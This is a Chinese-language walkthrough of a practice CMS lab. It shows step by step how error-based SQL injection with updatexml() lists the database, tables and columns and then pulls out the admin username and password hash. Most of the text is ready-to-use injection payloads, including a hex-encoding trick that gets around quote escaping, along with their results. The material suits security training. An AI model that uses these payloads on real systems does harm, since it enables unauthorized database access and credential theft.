cms靶场报错注入

使用updatexml进行注入

先查询数据库名，得到数据库名称为cms

?id=33 and updatexml(1,concat(0x5e,(select database()),0x5e),1)

查看数据库中的表，数据库中的表名，列名在information_schema数据库中保存，查看information_schema数据库表，先查看cms中有多少表得到结果有8个表

?id=33 and updatexml(1,concat(0x5e,(select count(*) from information_schema.tables where table_schema=database()),0x5e),1)

使用分页查看内容table_name，之前统计cms中共有8张表，但是回显只能回显一行

limit 0,1：查看第0页第一行

limit 1,1：查看第1页第一行

?id=33 and updatexml(1,concat(0x5e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x5e),1)

cms_article

?id=33 and updatexml(1,concat(0x5e,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x5e),1)

cms_category
cms_file
cms_friendlink
cms_message
cms_notice
cms_page
cms_users

查看users表中的列名，但是单引号被转义，我们可以将单引号中的内容转为十六进制内容

http://192.168.16.136/cms/show.php?id=33 and updatexml(1,concat(0x5e,(select column_name from information_schema.columns where table_schema=database() and table_name='cms_users' limit 0,1),0x5e),1)

?id=33 and updatexml(1,concat(0x5e,(select column_name from information_schema.columns where table_schema=database() and table_name=0x636d735f7573657273 limit 0,1),0x5e),1)

userid
username
password

得到数据库名、表名和列名，查看用户名和密码

?id=33 and updatexml(1,concat(0x5e,(select username from cms_users limit 0,1),0x5e),1)

得到用户名：admin

数据回显时可能会有长度限制，使用substr()函数将要查询的内容分批输出。substr()函数括起来的字符串排序第一位是1，但是通常的字符串排序第一位是0，

先查看密码有多长，密码长度32位

?id=33 and updatexml(1,concat(0x5e,(select length(password) from cms_users limit 0,1),0x5e),1)

先显示前16位，然后显示后16位

?id=33 and updatexml(1,concat(0x5e,(select substr(password,1,16) from cms_users limit 0,1),0x5e),1) #substr(password,1,16)表示password第一位开始输出，输出到第十六位

e10adc3949ba59ab

?id=33 and updatexml(1,concat(0x5e,(select substr(password,17,32) from cms_users limit 0,1),0x5e),1) #substr(password,17,32)表示password第十七位开始输出，输出到第三十二位

be56e057f20f883e

e10adc3949ba59abbe56e057f20f883e